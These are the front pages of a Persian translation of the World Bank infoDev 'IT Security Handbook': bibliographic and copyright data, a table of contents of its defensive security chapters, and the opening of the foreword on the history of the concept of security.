You are on page 1of 509

‫ﺭﺍﻫﻨﻤﺎﻱ‬

‫ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬

‫ﺗﺄﻟﻴﻒ‪:‬‬
‫ﺟﻮﺭﺝ ﺳﺎﺩﻭﺳـﻜﺎﻱ‬
‫ﺟﻴﻤﺰ ﺍﻛﺲ‪ .‬ﺩﻣﭙﺰﻱ‬
‫ﺁﻟـﻦ ﮔﺮﻳﻦﺑﺮﮒ‬
‫ﺑﺎﺭﺑﺎﺭﺍ ﺟﻲ‪ .‬ﻣﻚ‬
‫ﺁﻟـﻦ ﺷﻮﺍﺭﺗﺰ‬

‫ﺗﺮﺟﻤﺔ‪:‬‬
‫ﻣﻬﺪﻱ ﻣﻴﺮﺩﺍﻣـﺎﺩﻱ‬
‫ﺯﻫــﺮﺍ ﺷﺠــﺎﻋﻲ‬
‫ﻣﺤﻤﺪﺟﻮﺍﺩ ﺻﻤﺪﻱ‬

‫ﺩﺑﻴﺮﺧﺎﻧﻪ‬
‫ﺷﻮﺭﺍﻱﻋﺎﻟﻲ ﺍﻃﻼﻉﺭﺳﺎﻧﻲ‬

‫ﺗﻴﺮﻣﺎﻩ ‪۱۳۸۴‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ = ‪ / IT Security Handbook‬ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﺟﻮﺭﺝ ﺳﺎﺩﻭﺳﮑﺎﻱ ‪] ...‬ﻭ ﺩﻳﮕﺮﺍﻥ[؛ ﮔﺮﻭﻩ ﻣﺘﺮﺟﻤﻴﻦ ﻣﻬﺪﻱ‬
‫ﻣﻴﺮﺩﺍﻣﺎﺩﻱ‪ ،‬ﺯﻫﺮﺍ ﺷﺠﺎﻋﻲ‪ ،‬ﻣﺤﻤﺪﺟﻮﺍﺩ ﺻﻤﺪﻱ‪ -- .‬ﺗﻬﺮﺍﻥ‪ ،‬ﺷﻮﺭﺍﻱ ﻋﺎﻟﻲ ﺍﻃﻼﻉﺭﺳﺎﻧﻲ‪ ،‬ﺩﺑﻴﺮﺧﺎﻧﻪ‪.۱۳۸۴ ،‬‬
‫‪ ۵۰۹‬ﺹ‪:.‬ﺟﺪﻭﻝ‪ ۵۰،۰۰۰ .‬ﺭﻳﺎﻝ‬
‫‪ISBN: 964-8846-26-x‬‬
‫‪IT Security Handbook‬‬ ‫ﻋﻨﻮﺍﻥ ﺑﻪ ﺍﻧﮕﻠﻴﺴﻲ‪:‬‬
‫ﻓﻬﺮﺳﺘﻨﻮﻳﺴﻲ ﺑﺮ ﺍﺳﺎﺱ ﺍﻃﻼﻋﺎﺕ ﻓﻴﭙﺎ‪.‬‬
‫ﮐﺘﺎﺑﻨﺎﻣﻪ‪ :‬ﺹ‪۵۰۹ .‬؛ ﻫﻤﭽﻨﻴﻦ ﺑﻪ ﺻﻮﺭﺕ ﺯﻳﺮﻧﻮﻳﺲ‪ .‬ﻧﻤﺎﻳﻪ‪.‬‬
‫‪ .۱‬ﺗﮑﻨﻮﻟﻮﮊﻱ ﺍﻃﻼﻋﺎﺕ ‪ --‬ﺍﻗﺪﺍﻣﺎﺕ ﺗﺄﻣﻴﻨﻲ‪ .‬ﺍﻟﻒ‪ .‬ﺳﺎﺩﻭﺳﮑﺎﻱ‪ ،‬ﺟﻮﺭﺝ‪ .Sadowsky ،George ،‬ﺏ‪.‬ﻣﻴﺮﺩﺍﻣﺎﺩﻱ‪ ،‬ﻣﻬﺪﻱ ‪ ،- - ۱۳۵۹ -‬ﻣﺘﺮﺟﻢ‪.‬‬
‫ﺝ‪.‬ﺷﺠﺎﻋﻲ‪ ،‬ﺯﻫﺮﺍ‪ ،‬ﻣﺘﺮﺟﻢ‪ .‬ﺩ‪.‬ﺻﻤﺪﻱ‪ ،‬ﻣﺤﻤﺪﺟﻮﺍﺩ‪ ،‬ﻣﺘﺮﺟﻢ‪ .‬ﻫـ ‪.‬ﺷﻮﺭﺍﻱ ﻋﺎﻟﻲ ﺍﻃﻼﻉﺭﺳﺎﻧﻲ‪ .‬ﺩﺑﻴﺮﺧﺎﻧﻪ‪ .‬ﻭ‪.‬ﻋﻨﻮﺍﻥ‪.‬‬
‫‪۳۰۳/۴۸۳۳‬‬ ‫‪۱۳۸۴‬‬ ‫‪۲۳‬ﺭ‪T۵۸/۵/‬‬

‫‪۸۴-۱۷۵۲۵‬ﻡ‬ ‫ﮐﺘﺎﺑﺨﺎﻧﻪ ﻣﻠﻲ ﺍﻳﺮﺍﻥ‬

‫ﺍﻳﻦ ﮐﺘﺎﺏ ﺗﺮﺟﻤﻪﺍﻱ ﺍﺳﺖ ﺍﺯ‪:‬‬


‫;‪George Sadowsky; James X. Dempsey; Alan Greenberg; Barbara J. Mack‬‬
‫‪Alan Schwartz; IT Security Handbook; infoDev, Worldbank; 2003.‬‬
‫)‪(ISBN: 964-03-9951-5; http://www.infodev-security.net/handbook‬‬

‫ﺭﺍﻫﻨﻤـﺎﻱ ﺍﻣﻨﻴـﺖ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ‬


‫© ﺣﻖ ﭼﺎﭖ‪ ۱۳۸۳ :‬ﺩﺑﻴﺮﺧﺎﻧﺔ ﺷﻮﺭﺍﻱﻋﺎﻟﻲ ﺍﻃﻼﻉﺭﺳﺎﻧﻲ‬
‫ﻣﺆﻟﻔﻴﻦ‪ :‬ﺟﻮﺭﺝ ﺳﺎﺩﻭﺳﮑﺎﻱ‪ ،‬ﺟﻴﻤﺰ ﺍﮐﺲ‪ .‬ﺩﻣﭙﺰﻱ‪ ،‬ﺁﻟﻦ ﮔﺮﻳﻦﺑﺮﮒ‪ ،‬ﺑﺎﺭﺑﺎﺭﺍ ﺟﻲ‪ .‬ﻣﮏ‪ ،‬ﺁﻟﻦ ﺷﻮﺍﺭﺗﺰ‬
‫ﮔـﺮﻭﻩ ﻣﺘﺮﺟﻤﻴﻦ‪ :‬ﻣﻬﺪﻱ ﻣﻴﺮﺩﺍﻣـﺎﺩﻱ )‪(mirmahdi@ashnasecure.com‬‬
‫ﺯﻫــﺮﺍ ﺷﺠــﺎﻋـﻲ )‪(z.shojaee@ashnasecure.com‬‬
‫ﻣﺤﻤﺪﺟﻮﺍﺩ ﺻﻤﺪﻱ )‪(m.samadi@ashnasecure.com‬‬
‫ﻭﻳـﺮﺍﻳﺶ ﻓﻨـﻲ‪ :‬ﻣﻬﺪﻱ ﻣﻴﺮﺩﺍﻣـﺎﺩﻱ‬
‫ﺻﻔﺤـﻪﺁﺭﺍﻳﻲ ﻭ ﻧﺴﺨـﻪﭘﺮﺩﺍﺯﻱ‪ :‬ﻣـﺎﺭﻳـــﺎ ﻗــﺎﺩﺭﻱ )‪(maria_ghaderi@yahoo.com‬‬
‫ﻟﻴﺘﻮﮔﺮﺍﻓﻲ‪ ،‬ﭼﺎﭖ ﻭ ﺻﺤﺎﻓﻲ‪ :‬ﺷﺮﮐﺖ ﺍﻧﺘﺸﺎﺭﺍﺕ ﮔﻞﻭﺍﮊﻩ‬
‫ﻧﺎﻇﺮ ﭼﺎﭖ‪ :‬ﺳﻌﻴﺪ ﺯﺭﺍﻋﺘﻲ )‪(ss_zeraati@yahoo.com‬‬
‫ﻧﻮﺑﺖ ﭼﺎﭖ‪ :‬ﺍﻭﻝ ‪۱۳۸۴‬‬
‫ﺷﻤـﺎﺭﮔﺎﻥ‪ ۱۵۰۰ :‬ﻧﺴﺨﻪ‬
‫ﺷــﺎﺑـﮏ‪ISBN: 964-8846-26-x / ۹۶۴-۸۸۴۶-۲۶-x :‬‬
‫ﺷﻤﺎﺭﺓ ﭘﻴﺎﭘﻲ ﺍﻧﺘﺸﺎﺭﺍﺕ ﺩﺑﻴﺮﺧﺎﻧﻪ‪۸۴-۱۴ :‬‬
‫ﻗـﻴـﻤـﺖ‪ ۵۰،۰۰۰ :‬ﺭﻳﺎﻝ‬
‫ﻧﺸﺎﻧﻲ ﭘﺴﺘﻲ‪ :‬ﺗﻬﺮﺍﻥ‪ ،‬ﺧﻴﺎﺑﺎﻥ ﺷﺮﻳﻌﺘﻲ‪ ،‬ﻧﺮﺳﻴﺪﻩ ﺑﻪ ﭼﻬﺎﺭﺭﺍﻩ ﺷﻬﻴﺪ ﻗﺪﻭﺳﻲ‪ ،‬ﻧﺒﺶ ﺍﻧﺪﻳﺸﻪ ﻳﻜﻢ‪ ،‬ﺷﻤﺎﺭﺓ ‪۸۰۸‬‬
‫ﺗﻠﻔﻦ‪ ۸۸۴۴۸۰۳۷ :‬ﻭ ‪ ۸۸۴۴۸۰۳۸‬ﻧﻤﺎﺑﺮ‪ ، ۸۸۴۴۸۰۳۸ :‬ﺹ‪.‬ﭖ‪۱۳۱۵ :‬ـ ‪۱۶۳۱۵‬‬
‫ﻧﺸﺎﻧﻲ ﻭﺑﮕﺎﻩ‪http://www.scict.ir :‬‬
‫ﻓﻬﺮﺳﺖ‬

‫‪۷‬‬ ‫ﭘﻴﺶﮔﻔﺘﺎﺭ ‪..............................................................................................................................................................................‬‬


‫‪۹‬‬ ‫ﻳﺎﺩﺩﺍﺷﺖ ﻣﺘﺮﺟﻤﻴﻦ ‪..............................................................................................................................................................‬‬
‫‪۱۱‬‬ ‫ﺩﻳﺒﺎﭼﻪ ‪....................................................................................................................................................................................‬‬
‫‪۱۳‬‬ ‫ﭘﻴﺶ ﺩﺭﺁﻣﺪ ‪...........................................................................................................................................................................‬‬
‫‪۱۹‬‬ ‫ﺧﻼﺻﺔ ﺍﺟﺮﺍﻳﻲ ‪.....................................................................................................................................................................‬‬
‫ﺑﺨﺶ ﺍﻭﻝ‪ .‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ ‪۲۵ .............................................................................................‬‬
‫‪۴۵‬‬ ‫ﺑﺨﺶ ﺩﻭﻡ‪ .‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ ‪..............................................................................................‬‬
‫‪۴۷‬‬ ‫ﻓﺼﻞ ‪ .۱‬ﻣﻘﺪﻣﻪ ‪......................................................................................................................................................‬‬
‫‪۴۹‬‬ ‫ﻓﺼﻞ ‪ .۲‬ﺩﺭﮎ ﻣﻔﺎﻫﻴﻢ ﺍﻣﻨﻴﺘﻲ ‪................................................................................................................................‬‬
‫‪۵۵‬‬ ‫ﻓﺼﻞ ‪ .۳‬ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﻭ ﺩﺍﺩﻩﻫﺎ ‪..............................................................................................................................‬‬
‫‪۶۵‬‬ ‫ﻓﺼﻞ ‪ .۴‬ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ‪...........................................................................................‬‬
‫‪۷۱‬‬ ‫ﻓﺼﻞ ‪ .۵‬ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺮﺏ ‪................................................................................................................................‬‬
‫‪۷۹‬‬ ‫ﻓﺼﻞ ‪ .۶‬ﺍﻣﻨﻴﺖ ﺧﺪﻣﺎﺕ ﺷﺒﻜﻪ ‪...............................................................................................................................‬‬
‫‪۹۳‬‬ ‫ﻓﺼﻞ ‪ .۷‬ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎﻱ ﺍﻣﻨﻴﺖ ‪..................................................................................................................‬‬
‫‪۹۹‬‬ ‫ﻓﺼﻞ ‪ .۸‬ﻧﻜﺎﺕ ﻭﻳﮋﺓ ﺑﺴﺘﺮﻫﺎﻱ ﻣﺨﺘﻠﻒ ‪..................................................................................................................‬‬
‫‪۱۰۵‬‬ ‫ﺿﻤﻴﻤﺔ ‪ .۱‬ﺁﺷﻨﺎﻳﻲ ﺑﺎ ﻛﺪﮔﺬﺍﺭﻱ ﻭ ﺭﻣﺰﮔﺬﺍﺭﻱ ‪.............................................................................................................‬‬
‫‪۱۱۱‬‬ ‫ﺿﻤﻴﻤﺔ ‪................................................................................................................................................. TCP/IP .۲‬‬
‫‪۱۱۵‬‬ ‫ﺿﻤﻴﻤﺔ ‪ .۳‬ﻭﺍﮊﻩﻧﺎﻣﺔ ﺍﺻﻄﻼﺣﺎﺕ ﻓﻨﻲ ‪........................................................................................................................‬‬
‫‪۱۱۹‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ .‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ ‪......................................................................................................‬‬
‫‪۱۲۱‬‬ ‫ﻓﺼﻞ ‪ .۱‬ﻣﻘﺪﻣﻪ ‪......................................................................................................................................................‬‬
‫‪۱۲۷‬‬ ‫ﻓﺼﻞ ‪ .۲‬ﻣﺮﻭﺭﻱ ﺑﺮ ﺭﻭﺷﻬﺎﻱ ﻛﺎﻫﺶ ﺁﺛﺎﺭ ﻣﺨﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ‪.................................................................‬‬
‫‪۱۳۷‬‬ ‫ﻓﺼﻞ ‪ .۳‬ﺑﺮﺁﻭﺭﺩ ﻣﺨﺎﻃﺮﻩ ﻭ ﺗﺤﻠﻴﻞ ﺯﻳﺎﻥ ‪.................................................................................................................‬‬
‫‪۱۴۵‬‬ ‫ﻓﺼﻞ ‪ .۴‬ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﺑﺮﺍﻱ ﻧﻴﺎﺯﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ‪............................................................................................................‬‬
‫‪۱۴۹‬‬ ‫ﻓﺼﻞ ‪ .۵‬ﭘﻴﺸﮕﻴﺮﻱ ﻭ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺖ ﺳﺎﺯﻣﺎﻧﻲ ‪.......................................................................................................‬‬
‫‪۱۵۹‬‬ ‫ﻓﺼﻞ ‪ .۶‬ﺍﻣﻨﻴﺖ ﻛﺎﺭﻛﻨﺎﻥ ‪........................................................................................................................................‬‬
‫‪۱۶۷‬‬ ‫ﻓﺼﻞ ‪ .۷‬ﺑﺮﻭﻧﺴﭙﺎﺭﻱ ﺍﻣﻨﻴﺖ ‪....................................................................................................................................‬‬
‫‪۱۷۵‬‬ ‫ﻓﺼﻞ ‪ .۸‬ﻗﺎﻧﻮﻥﻧﻮﻳﺴﻲ‪ ،‬ﺗﺪﻭﻳﻦ ﺁﺋﻴﻦﻧﺎﻣﻪﻫﺎﻱ ﺩﻭﻟﺘﻲ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ‪...................................................‬‬
‫‪۱۷۹‬‬ ‫ﻓﺼﻞ ‪ .۹‬ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ‪........................................................................................................................................‬‬
‫‪۱۸۵‬‬ ‫ﻓﺼﻞ ‪ .۱۰‬ﻣﺪﻳﺮﻳﺖ ﻣﺨﺎﻃﺮﺍﺕ ﺳﻴﺎﺭ‪ :‬ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﻣﺤﻴﻂ ﺑﻲﺳﻴﻢ ‪.....................................................‬‬
‫‪۱۹۷‬‬ ‫ﻓﺼﻞ ‪ .۱۱‬ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ‪ :‬ﺍﻳﺠﺎﺩ ﻓﺮﻫﻨﮓ ﺍﻣﻨﻴﺖ ‪.................................................................................................‬‬
‫‪۲۰۵‬‬ ‫ﻓﺼﻞ ‪ .۱۲‬ﻗﻮﺍﻋﺪ ﺍﻳﻤﻨﻲ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺮﺍﻱ ﻫﻤﺔ ﻛﺎﺭﺑﺮﺍﻥ ﻭ ﺷﺮﻛﺘﻬﺎ ‪...............................................................‬‬
‫‪۲۱۵‬‬ ‫ﻓﺼﻞ ‪ .۱۳‬ﮔﻔﺘﮕﻮﻫﺎﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﭘﻴﺮﺍﻣﻮﻥ ﻣﻮﺿﻮﻉ ﺍﻣﻨﻴﺖ ‪.........................................................................................‬‬
‫‪۲۲۹‬‬ ‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ‪ .‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ ‪..................................................................................‬‬
‫‪۲۳۱‬‬ ‫ﻓﺼﻞ ‪ .۱‬ﻣﻘﺪﻣﻪ ‪......................................................................................................................................................‬‬
‫‪۲۳۵‬‬ ‫ﻓﺼﻞ ‪ .۲‬ﺣﻔﺎﻇﺖ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﻭﻟﺘﻲ ‪..................................................................................................................‬‬
‫‪۲۴۳‬‬ ‫ﻓﺼﻞ ‪ .۳‬ﻧﻘﺶ ﻗﺎﻧﻮﻥ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺖ ﺑﺮ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ‪................................................................................‬‬
‫‪۲۴۵‬‬ ‫ﻓﺼﻞ ‪ .۴‬ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺩﻭﻟﺖ ‪.................................................................................................................‬‬
‫‪۲۵۵‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ .‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ ‪...............................................................................................‬‬
‫‪۲۵۷‬‬ ‫ﻓﺼﻞ ‪ .۱‬ﻣﻘﺪﻣﻪ ‪......................................................................................................................................................‬‬
‫‪۲۶۵‬‬ ‫ﻓﺼﻞ ‪ .۲‬ﺍﻣﻨﻴﺖ ﺑﺮﺍﻱ ﺭﺍﻫﺒﺮﺍﻥ ‪................................................................................................................................‬‬
‫‪۲۷۹‬‬ ‫ﻓﺼﻞ ‪ .۳‬ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ‪.........................................................................................................................................‬‬
‫‪۲۹۱‬‬ ‫ﻓﺼﻞ ‪ .۴‬ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ‪.......................................................................................................................................‬‬
‫‪۳۱۳‬‬ ‫ﻓﺼﻞ ‪ .۵‬ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ‪.......................................................................................................................‬‬
‫‪۳۴۷‬‬ ‫ﻓﺼﻞ ‪ .۶‬ﺍﻣﻨﻴﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ‪...............................................................................................................................‬‬
‫‪۳۷۷‬‬ ‫ﻓﺼﻞ ‪ .۷‬ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪ ‪............................................................................................................................................‬‬
‫‪۴۰۹‬‬ ‫ﻓﺼﻞ ‪ .۸‬ﺍﻧﻮﺍﻉ ﺣﻤﻼﺕ ﻭ ﺭﻭﺷﻬﺎﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺁﻧﻬﺎ ‪.....................................................................................................‬‬
‫‪۴۲۳‬‬ ‫ﻓﺼﻞ ‪ .۹‬ﻛﺸﻒ ﻭ ﻣﺪﻳﺮﻳﺖ ﻧﻔﻮﺫ ‪..............................................................................................................................‬‬
‫‪۴۴۱‬‬ ‫ﻓﺼﻞ ‪ .۱۰‬ﻧﻜﺎﺕ ﻭﻳﮋﺓ ﺑﺴﺘﺮﻫﺎﻱ ﻣﺨﺘﻠﻒ ‪..................................................................................................................‬‬
‫‪۴۵۳‬‬ ‫ﺑﺨﺶ ﺷﺸﻢ‪ .‬ﭘﻴﻮﺳﺘﻬﺎ ‪........................................................................................................................................................‬‬
‫‪۴۵۵‬‬ ‫ﭘﻴﻮﺳﺖ ‪ .۱‬ﻭﺍﮊﻩﻧﺎﻣﻪ ﺍﺻﻄﻼﺣﺎﺕ ‪................................................................................................................................‬‬
‫‪۴۶۷‬‬ ‫ﭘﻴﻮﺳﺖ ‪ .۲‬ﻛﺘﺎﺑﻨﺎﻣﻪ ‪...................................................................................................................................................‬‬
‫‪۴۷۹‬‬ ‫ﭘﻴﻮﺳﺖ ‪ .۳‬ﻣﻨﺎﺑﻊ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ‪.....................................................................................................................................‬‬
‫‪۴۸۹‬‬ ‫ﭘﻴﻮﺳﺖ ‪ .۴‬ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ‪....................................................................................................................................‬‬
‫‪۴۹۵‬‬ ‫ﭘﻴﻮﺳﺖ ‪ .۵‬ﻣﻨﺎﺑﻊ ﭼﺎﭘﻲ ‪..............................................................................................................................................‬‬
‫ﻟﻐﺎﺕ ﻭ ﺍﺻﻄﻼﺣﺎﺕ ﺭﺍﻳﺞ ﺍﻣﻨﻴﺘﻲ ‪۵۰۳ ........................................................................................................................................‬‬
‫ﭘﻴﺶﮔﻔﺘﺎﺭ‬

‫ﻼ ﺷﻨﺎﺧﺘﻪﺷﺪﻩ ﺑﺮﺍﻱ ﺑـﺸﺮ ﺑـﻮﺩﻩ ﻭ ﻫـﺴﺖ‪ .‬ﺩﺭ ﺩﻭﺭﺍﻥ ﻣﺎﻗﺒـﻞ ﺗـﺎﺭﻳﺦ‪ ،‬ﺍﻣﻨﻴـﺖ‬ ‫ﻣﻔﻬﻮﻡ ﺍﻣﻨﻴﺖ ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﻣﻔﻬﻮﻣﻲ ﺣﻴﺎﺗﻲ ﻭ ﻛﺎﻣ ﹰ‬
‫ﻼ ﻓﻴﺰﻳﻜﻲ ﺭﺍ ﺷﺎﻣﻞ ﻣﻲﺷﺪ ﻛﻪ ﻋﺒﺎﺭﺕ ﺑﻮﺩ ﺍﺯ ﺍﺻﻮﻝ ﺣﻔﻆ ﺑﻘﺎ ﻧﻈﻴﺮ ﺍﻣﻨﻴﺖ ﺩﺭ ﺑﺮﺍﺑﺮ ﺣﻤﻠﺔ ﺩﻳﮕﺮﺍﻥ ﻳﺎ ﺣﻴﻮﺍﻧﺎﺕ ﻭ ﻧﻴـﺰ ﺍﻣﻨﻴـﺖ‬ ‫ﻣﻔﻬﻮﻣﻲ ﻛﺎﻣ ﹰ‬
‫ﺗﺄﻣﻴﻦ ﻏﺬﺍ‪ .‬ﺑﺘﺪﺭﻳﺞ ﻧﻴﺎﺯﻫﺎﻱ ﺩﻳﮕﺮﻱ ﭼﻮﻥ ﺍﻣﻨﻴﺖ ﺩﺭ ﺑﺮﺍﺑﺮ ﺣﻮﺍﺩﺙ ﻃﺒﻴﻌﻲ ﻳﺎ ﺑﻴﻤﺎﺭﻳﻬﺎ ﻭ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺷﺘﻦ ﻣﻜﺎﻧﻲ ﺑﺮﺍﻱ ﺯﻧﺪﮔﻲ ﻭ ﺍﺳﺘﺮﺍﺣﺖ‬
‫ﺑﺪﻭﻥ ﻣﻮﺍﺟﻬﻪ ﺑﺎ ﺧﻄﺮ ﺑﻪ ﻧﻴﺎﺯﻫﺎﻱ ﭘﻴﺸﻴﻦ ﺑﺸﺮ ﺍﻓﺰﻭﺩﻩ ﺷﺪ‪ .‬ﺑﺎ ﭘﻴـﺸﺮﻓﺖ ﺗﻤـﺪﻥ ﻭ ﺷـﻜﻞﮔﻴـﺮﻱ ﺟﻮﺍﻣـﻊ‪ ،‬ﻣﺤـﺪﻭﺩﺓ ﺍﻣﻨﻴـﺖ ﺍﺑﻌـﺎﺩ ﺑـﺴﻴﺎﺭ‬
‫ﮔﺴﺘﺮﺩﻩﺗﺮﻱ ﻳﺎﻓﺖ ﻭ ﺑﺎ ﺗﻔﻜﻴﻚ ﺣﻮﺯﺓ ﺍﻣﻮﺍﻝ ﻭ ﺣﻘﻮﻕ ﺷﺨﺼﻲ ﺍﻓﺮﺍﺩ ﺍﺯ ﻳﻜﺪﻳﮕﺮ ﻭ ﺍﺯ ﺍﻣﻮﺍﻝ ﻋﻤﻮﻣﻲ‪ ،‬ﻭ ﻫﻤﭽﻨﻴﻦ ﺗﻌﺮﻳﻒ ﻗﻠﻤﺮﻭﻫﺎﻱ ﻣﻠﻲ ﻭ‬
‫ﺑﻴﻦﺍﻟﻤﻠﻠﻲ‪ ،‬ﺑﺘﺪﺭﻳﺞ ﻣﻔﺎﻫﻴﻢ ﻭﺳﻴﻌﻲ ﻣﺎﻧﻨﺪ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ‪ ،‬ﺍﻣﻨﻴﺖ ﺍﺟﺘﻤﺎﻋﻲ‪ ،‬ﺍﻣﻨﻴﺖ ﻣﺎﻟﻲ‪ ،‬ﺍﻣﻨﻴﺖ ﺳﻴﺎﺳﻲ‪ ،‬ﺍﻣﻨﻴﺖ ﻣﻠﻲ ﻭ ﺍﻣﻨﻴﺖ ﺍﻗﺘـﺼﺎﺩﻱ‬
‫ﻼ ﻣﺤﺪﻭﺩ ﺑﻪ ﻧﻴﺎﺯﻫﺎﻱ ﻓﻴﺰﻳﻜﻲ ﺑﺸﺮ ﻧﻤﻲﺷﺪﻧﺪ‪ ،‬ﻭﻟﻲ ﻋﻤﺪﺗﹰﺎ ﺗﺤﻘﻖ ﻭ ﺩﺳـﺘﻴﺎﺑﻲ ﺑـﻪ ﺁﻧﻬـﺎ‬ ‫ﺭﺍ ﻧﻴﺰ ﺷﺎﻣﻞ ﮔﺮﺩﻳﺪ‪ .‬ﺍﻳﻦ ﻣﻔﺎﻫﻴﻢ ﮔﺮﭼﻪ ﺩﻳﮕﺮ ﻛﺎﻣ ﹰ‬
‫ﻣﺴﺘﻠﺰﻡ ﻭﺟﻮﺩ ﻭ ﻳﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﺤﻴﻂﻫﺎﻱ ﻭﺍﻗﻌﻲ ﻭ ﻓﻴﺰﻳﻜﻲ ﺑﻮﺩ‪.‬‬
‫ﻟﻴﻜﻦ ﺟﻬﺎﻥ ﺩﺭ ﺩﻫﻪﻫﺎﻱ ﺍﺧﻴﺮ ﻭ ﺑﻮﻳﮋﻩ ﺩﺭ ﭘﻨﺞ ﺳﺎﻝ ﮔﺬﺷﺘﻪ ﻋﺮﺻﺔ ﺗﺤﻮﻻﺕ ﭼﺸﻤﮕﻴﺮﻱ ﺑﻮﺩﻩ ﻛﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻨﺎﺳﺒﺎﺕ ﻭ ﻣﻌـﺎﺩﻻﺕ‬
‫ﭘﻴﺸﻴﻦ ﺭﺍ ﺑﻄﻮﺭ ﺍﺳﺎﺳﻲ ﺩﺳﺘﺨﻮﺵ ﺗﻐﻴﻴﺮ ﻧﻤﻮﺩﻩ ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﺗﺤﻮﻻﺕ ﻛﻪ ﺑﺎ ﻣﺤﻮﺭﻳﺖ ﻛـﺎﺭﺑﺮﻱ ﻭﺳـﻴﻊ ﺍﺯ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃـﺎﺕ‬
‫ﺍﻣﻜﺎﻧﭙﺬﻳﺮ ﺷﺪﻩ‪ ،‬ﺍﺯ ﻛﺎﺭﺑﺮﺩ ﺭﺍﻳﺎﻧﻪ ﺑﻪ ﻋﻨﻮﺍﻥ ﺍﺑﺰﺍﺭ ﺧﻮﺩﻛﺎﺭﺳﺎﺯﻱ )‪ (Automation‬ﻭ ﺍﻓﺰﺍﻳﺶ ﺑﻬﺮﻩﻭﺭﻱ ﺁﻏـﺎﺯ ﮔﺮﺩﻳـﺪﻩ ﻭ ﺍﻛﻨـﻮﻥ ﺑـﺎ ﺗﻜﺎﻣـﻞ‬
‫ﻼ ﺯﻧﺪﮔﻲ ﻓﺮﺩﻱ ﻭ ﺍﺟﺘﻤﺎﻋﻲ ﺑﺸﺮ ﺭﺍ ﺩﮔﺮﮔﻮﻥ ﺳﺎﺧﺘﻪ ﺍﺳﺖ‪ .‬ﺑـﻪ‬ ‫ﻛﺎﺭﺑﺮﻱ ﺁﻥ ﺩﺭ ﺍﻳﺠﺎﺩ ﻓﻀﺎﻱ ﻫﻢﺍﻓﺰﺍﺋﻲ ﻣﺸﺎﺭﻛﺘﻲ )‪ ،(Collaboration‬ﻋﻤ ﹰ‬
